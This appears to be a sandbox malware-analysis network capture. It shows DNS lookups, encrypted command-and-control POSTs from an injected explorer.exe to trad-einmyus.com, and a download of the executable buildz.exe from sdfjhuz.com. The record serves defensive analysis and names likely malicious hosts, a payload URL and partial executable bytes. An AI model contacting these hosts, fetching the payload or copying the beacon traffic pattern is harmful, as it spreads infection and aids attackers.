                                                                                              May 25, 2024 21:29:36.978903055 CEST1.1.1.1192.168.2.40x881No error (0)api.2ip.ua188.114.96.3A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:36.978903055 CEST1.1.1.1192.168.2.40x881No error (0)api.2ip.ua188.114.97.3A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:42.415780067 CEST1.1.1.1192.168.2.40x210aNo error (0)www.safeautomationbd.comsafeautomationbd.comCNAME (Canonical name)IN (0x0001)false
                                                                                              May 25, 2024 21:29:42.415780067 CEST1.1.1.1192.168.2.40x210aNo error (0)safeautomationbd.com103.174.152.66A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:43.437458992 CEST1.1.1.1192.168.2.40xab9aNo error (0)cajgtus.com213.172.74.157A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:43.437458992 CEST1.1.1.1192.168.2.40xab9aNo error (0)cajgtus.com148.230.249.9A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:43.437458992 CEST1.1.1.1192.168.2.40xab9aNo error (0)cajgtus.com201.119.118.19A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:43.437458992 CEST1.1.1.1192.168.2.40xab9aNo error (0)cajgtus.com200.114.83.251A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:43.437458992 CEST1.1.1.1192.168.2.40xab9aNo error (0)cajgtus.com58.151.148.90A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:43.437458992 CEST1.1.1.1192.168.2.40xab9aNo error (0)cajgtus.com211.168.53.110A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:43.437458992 CEST1.1.1.1192.168.2.40xab9aNo error (0)cajgtus.com200.122.37.247A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:43.437458992 CEST1.1.1.1192.168.2.40xab9aNo error (0)cajgtus.com181.129.118.140A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:43.437458992 CEST1.1.1.1192.168.2.40xab9aNo error (0)cajgtus.com201.113.204.230A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:43.437458992 CEST1.1.1.1192.168.2.40xab9aNo error (0)cajgtus.com190.147.128.172A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:43.444406986 CEST1.1.1.1192.168.2.40xab9aNo error (0)cajgtus.com213.172.74.157A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:43.444406986 CEST1.1.1.1192.168.2.40xab9aNo error (0)cajgtus.com148.230.249.9A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:43.444406986 CEST1.1.1.1192.168.2.40xab9aNo error (0)cajgtus.com201.119.118.19A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:43.444406986 CEST1.1.1.1192.168.2.40xab9aNo error (0)cajgtus.com200.114.83.251A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:43.444406986 CEST1.1.1.1192.168.2.40xab9aNo error (0)cajgtus.com58.151.148.90A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:43.444406986 CEST1.1.1.1192.168.2.40xab9aNo error (0)cajgtus.com211.168.53.110A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:43.444406986 CEST1.1.1.1192.168.2.40xab9aNo error (0)cajgtus.com200.122.37.247A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:43.444406986 CEST1.1.1.1192.168.2.40xab9aNo error (0)cajgtus.com181.129.118.140A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:43.444406986 CEST1.1.1.1192.168.2.40xab9aNo error (0)cajgtus.com201.113.204.230A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:43.444406986 CEST1.1.1.1192.168.2.40xab9aNo error (0)cajgtus.com190.147.128.172A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:43.444437981 CEST1.1.1.1192.168.2.40xab9aNo error (0)cajgtus.com213.172.74.157A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:43.444437981 CEST1.1.1.1192.168.2.40xab9aNo error (0)cajgtus.com148.230.249.9A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:43.444437981 CEST1.1.1.1192.168.2.40xab9aNo error (0)cajgtus.com201.119.118.19A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:43.444437981 CEST1.1.1.1192.168.2.40xab9aNo error (0)cajgtus.com200.114.83.251A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:43.444437981 CEST1.1.1.1192.168.2.40xab9aNo error (0)cajgtus.com58.151.148.90A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:43.444437981 CEST1.1.1.1192.168.2.40xab9aNo error (0)cajgtus.com211.168.53.110A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:43.444437981 CEST1.1.1.1192.168.2.40xab9aNo error (0)cajgtus.com200.122.37.247A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:43.444437981 CEST1.1.1.1192.168.2.40xab9aNo error (0)cajgtus.com181.129.118.140A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:43.444437981 CEST1.1.1.1192.168.2.40xab9aNo error (0)cajgtus.com201.113.204.230A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:43.444437981 CEST1.1.1.1192.168.2.40xab9aNo error (0)cajgtus.com190.147.128.172A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:45.203561068 CEST1.1.1.1192.168.2.40xaa3bNo error (0)steamcommunity.com104.102.42.29A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:52.816270113 CEST1.1.1.1192.168.2.40xf412No error (0)nessotechbd.com192.185.16.114A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:30:24.203641891 CEST1.1.1.1192.168.2.40xf696No error (0)transfer.adttemp.com.br104.196.109.209A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:30:31.660413027 CEST1.1.1.1192.168.2.40x7027No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:30:31.660413027 CEST1.1.1.1192.168.2.40x7027No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:30:31.660413027 CEST1.1.1.1192.168.2.40x7027No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:30:31.660413027 CEST1.1.1.1192.168.2.40x7027No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:30:31.660413027 CEST1.1.1.1192.168.2.40x7027No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:30:43.059668064 CEST1.1.1.1192.168.2.40xc391No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                              • api.2ip.ua
                                                                                              • www.safeautomationbd.com
                                                                                              • steamcommunity.com
                                                                                              • 65.109.242.59
                                                                                              • nessotechbd.com
                                                                                              • transfer.adttemp.com.br
                                                                                              • cdn.discordapp.com
                                                                                              • kpyjjvqdiemoiebl.com
                                                                                                • trad-einmyus.com
                                                                                              • lelfqipvajp.com
                                                                                              • jncoidythmtum.com
                                                                                              • ecmpkonsxath.com
                                                                                              • qhahtsyildlx.org
                                                                                              • gdvgvnpnsfha.com
                                                                                              • hexeftuymxc.net
                                                                                              • vtxhrpouhnlhicef.org
                                                                                              • sdfjhuz.com
                                                                                              • cmovmgvridjjk.com
                                                                                              • uopmqrlryhqym.com
                                                                                              • kdrrcifvupv.net
                                                                                              • froejfbfqcabvk.com
                                                                                              • ijjaoopskaipyfot.org
                                                                                              • qlrqehiwqptv.com
                                                                                              • jkukpjjesbti.net
                                                                                              • cajgtus.com
                                                                                              • mxmwgpprwcpwxem.com
                                                                                              • bglvkirrchdcy.com
                                                                                              • syppprqoaeoyrm.org
                                                                                              • syrimjyxlgxo.net
                                                                                              • doewnlgtcbtsgiu.com
                                                                                              • uetjtbokcendpi.net
                                                                                              • obuibmhfpgvomgod.com
                                                                                              • ukrvqlmerplrex.com
                                                                                              • tldcvhhvnmxh.com
                                                                                              • ncehelngswfsf.com
                                                                                              • amrbjqbtgpnr.net
                                                                                              • lejcpsbnxtuxdtx.org
                                                                                              • trlgbchacigdlq.net
                                                                                              • irythjvgtsstcpv.net
                                                                                              • nwelovrvoirfrsd.org
                                                                                              • xvkfgvcftmyct.com
                                                                                              • jpkolefxkmrqfjw.org
                                                                                              • 91.92.253.69
                                                                                              • duxgasiuxdjh.com
                                                                                              • 185.154.13.143
                                                                                              • dejiweyxqsl.net
                                                                                              • jyqccrxyqqnpjdg.org
                                                                                              • 193.233.132.167
                                                                                              • thhfncmsprqy.org
                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.449736158.160.165.129802580C:\Windows\explorer.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 25, 2024 21:29:23.042406082 CEST286OUTPOST /index.php HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://kpyjjvqdiemoiebl.com/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 206
                                                                                              Host: trad-einmyus.com
                                                                                              May 25, 2024 21:29:23.046097040 CEST206OUTData Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 32 83 9d 33
                                                                                              Data Ascii: ?v1y5eCDhTz\Fu$f]d23H]qslZwXm*`W]DC#t?#Vr8.zcuDHY3(T>!?KfUqj;V#^-Sj
                                                                                              May 25, 2024 21:29:23.900290012 CEST190INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.20.2
                                                                                              Date: Sat, 25 May 2024 19:29:23 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Data Raw: 38 0d 0a 04 00 00 00 79 fa f7 1c 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: 8y0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.2.449737158.160.165.129802580C:\Windows\explorer.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 25, 2024 21:29:23.967891932 CEST281OUTPOST /index.php HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://lelfqipvajp.com/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 298
                                                                                              Host: trad-einmyus.com
                                                                                              May 25, 2024 21:29:23.967955112 CEST298OUTData Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 9e 66 5d 02 c8 a1 c1 64 07 9c dc 11
                                                                                              Data Ascii: ?v1y5eCDhTz\Fu$f]d,eh`WsnkFj:eI\fcE8'6j+;WW9K2:_W>RI_.nWKPyplsVE}e}[Sbi2yl$Hd0K?
                                                                                              May 25, 2024 21:29:24.697138071 CEST597INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.20.2
                                                                                              Date: Sat, 25 May 2024 19:29:24 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 [TRUNCATED]
                                                                                              Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              2192.168.2.449738158.160.165.129802580C:\Windows\explorer.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 25, 2024 21:29:24.807765961 CEST283OUTPOST /index.php HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://jncoidythmtum.com/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 293
                                                                                              Host: trad-einmyus.com
                                                                                              May 25, 2024 21:29:24.808000088 CEST293OUTData Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 9f 66 5d 02 c8 a1 c1 64 11 a0 ba 27
                                                                                              Data Ascii: ?v1y5eCDhTz\Fu$f]d'6Hnv|0_p/S&yh//{-E:&(UODe#,m>IUGg"m#ch'W(JcH;}Hd2w*cvnd(-#oUpB'VS
                                                                                              May 25, 2024 21:29:25.521806955 CEST156INHTTP/1.1 200 OK
                                                                                              Server: nginx/1.20.2
                                                                                              Date: Sat, 25 May 2024 19:29:25 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Content-Length: 0
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              3192.168.2.449739158.160.165.129802580C:\Windows\explorer.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 25, 2024 21:29:25.627974033 CEST282OUTPOST /index.php HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://ecmpkonsxath.com/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 352
                                                                                              Host: trad-einmyus.com
                                                                                              May 25, 2024 21:29:25.628019094 CEST352OUTData Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 9c 66 5d 02 c8 a1 c1 64 21 c0 cc 23
                                                                                              Data Ascii: ?v1y5eCDhTz\Fu$f]d!#W}>FHTpG7O[xm:=h3'\d+yJ+9L/Qt Q"_Qq O'{UaKL*}%pz'r,CC[o^kAyP|o9S;5"
                                                                                              May 25, 2024 21:29:26.362864017 CEST262INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.20.2
                                                                                              Date: Sat, 25 May 2024 19:29:26 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Data Raw: 34 66 0d 0a 04 00 ed 98 a4 08 a8 37 33 7c 09 c7 22 84 f6 82 af 73 32 f3 a2 68 33 54 27 c3 83 be 8e 99 1e a2 08 c9 63 a5 53 63 97 09 f8 ea 22 e5 38 69 15 b9 e0 9e 0f a2 17 c9 02 94 a7 7a d4 60 a6 bc 8d 14 3b 84 c3 3f 44 88 dd ca 0a 86 89 a2 0c bd 74 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: 4f73|"s2h3T'cSc"8iz`;?Dt0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              4192.168.2.449740158.160.165.129802580C:\Windows\explorer.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 25, 2024 21:29:26.439460993 CEST282OUTPOST /index.php HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://qhahtsyildlx.org/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 193
                                                                                              Host: trad-einmyus.com
                                                                                              May 25, 2024 21:29:26.439519882 CEST193OUTData Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 84 de 9c 66 5d 02 c9 a1 c1 64 3e ba ad 19
                                                                                              Data Ascii: ?v1y5eCDhTz\Fu$f]d>$dnEFAV"Jf7Z=<.I/B:V]93%"iW43)0O}-}>h{8q2nV
                                                                                              May 25, 2024 21:29:27.185319901 CEST597INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.20.2
                                                                                              Date: Sat, 25 May 2024 19:29:27 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 [TRUNCATED]
                                                                                              Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              5192.168.2.449741158.160.165.129802580C:\Windows\explorer.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 25, 2024 21:29:27.244514942 CEST282OUTPOST /index.php HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://gdvgvnpnsfha.com/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 191
                                                                                              Host: trad-einmyus.com
                                                                                              May 25, 2024 21:29:27.244514942 CEST191OUTData Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 9d 66 5d 02 c8 a1 c1 64 56 86 a1 1d
                                                                                              Data Ascii: ?v1y5eCDhTz\Fu$f]dVKWFaAm`zx-x9B<4Z-:xOhz8YlWS2X?2qfa_?5c
                                                                                              May 25, 2024 21:29:27.978342056 CEST156INHTTP/1.1 200 OK
                                                                                              Server: nginx/1.20.2
                                                                                              Date: Sat, 25 May 2024 19:29:27 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Content-Length: 0
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              6192.168.2.449742158.160.165.129802580C:\Windows\explorer.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 25, 2024 21:29:28.037194014 CEST281OUTPOST /index.php HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://hexeftuymxc.net/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 279
                                                                                              Host: trad-einmyus.com
                                                                                              May 25, 2024 21:29:28.037194967 CEST279OUTData Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 9a 66 5d 02 c8 a1 c1 64 36 89 ca 36
                                                                                              Data Ascii: ?v1y5eCDhTz\Fu$f]d662|j8"Hp &" 5jOeJ-- 5YM fIum$lG?'yc/cO&=1zX?u?YPX{=1]<9u{dE,
                                                                                              May 25, 2024 21:29:28.747720003 CEST156INHTTP/1.1 200 OK
                                                                                              Server: nginx/1.20.2
                                                                                              Date: Sat, 25 May 2024 19:29:28 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Content-Length: 0
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              7192.168.2.449743158.160.165.129802580C:\Windows\explorer.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 25, 2024 21:29:28.810993910 CEST286OUTPOST /index.php HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://vtxhrpouhnlhicef.org/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 368
                                                                                              Host: trad-einmyus.com
                                                                                              May 25, 2024 21:29:28.810993910 CEST368OUTData Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 9b 66 5d 02 c8 a1 c1 64 32 b5 83 36
                                                                                              Data Ascii: ?v1y5eCDhTz\Fu$f]d26,st<bEdA1o TGa`&]#vtT]*$'[B?%MN;9P&RaS6#.1:a9}qQBky)+F5"6u.sD}DkKIcu>=
                                                                                              May 25, 2024 21:29:29.545032024 CEST227INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.20.2
                                                                                              Date: Sat, 25 May 2024 19:29:29 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Data Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d2 83 40 0d 63 07 ea e8 8f bd a7 5e a0 10 91 60 a2 5f 53 90 1f bf ec 31 e5 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: 2cI:82O@c^`_S10


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              8192.168.2.449744189.163.126.89802580C:\Windows\explorer.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 25, 2024 21:29:33.389586926 CEST162OUTGET /dl/buildz.exe HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Host: sdfjhuz.com
                                                                                              May 25, 2024 21:29:34.543318987 CEST1236INHTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Sat, 25 May 2024 19:29:34 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 751104
                                                                                              Last-Modified: Sat, 25 May 2024 19:20:05 GMT
                                                                                              Connection: close
                                                                                              ETag: "665239e5-b7600"
                                                                                              Accept-Ranges: bytes
                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c4 2a 01 d0 80 4b 6f 83 80 4b 6f 83 80 4b 6f 83 8d 19 b0 83 9a 4b 6f 83 8d 19 8f 83 f7 4b 6f 83 8d 19 8e 83 a7 4b 6f 83 89 33 fc 83 87 4b 6f 83 80 4b 6e 83 e8 4b 6f 83 35 d5 8e 83 81 4b 6f 83 8d 19 b4 83 81 4b 6f 83 35 d5 b1 83 81 4b 6f 83 52 69 63 68 80 4b 6f 83 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 25 39 28 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 e4 00 00 00 5c 90 02 00 00 00 00 c7 43 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 91 02 00 04 00 00 45 4f 0c 00 02 00 00 81 00 00 [TRUNCATED]
                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$*KoKoKoKoKoKo3KoKnKo5KoKo5KoRichKoPEL%9(d\C@`EOjPhTj`_@l.text `.rdataHrt@@.data`F\@.rsrch@@
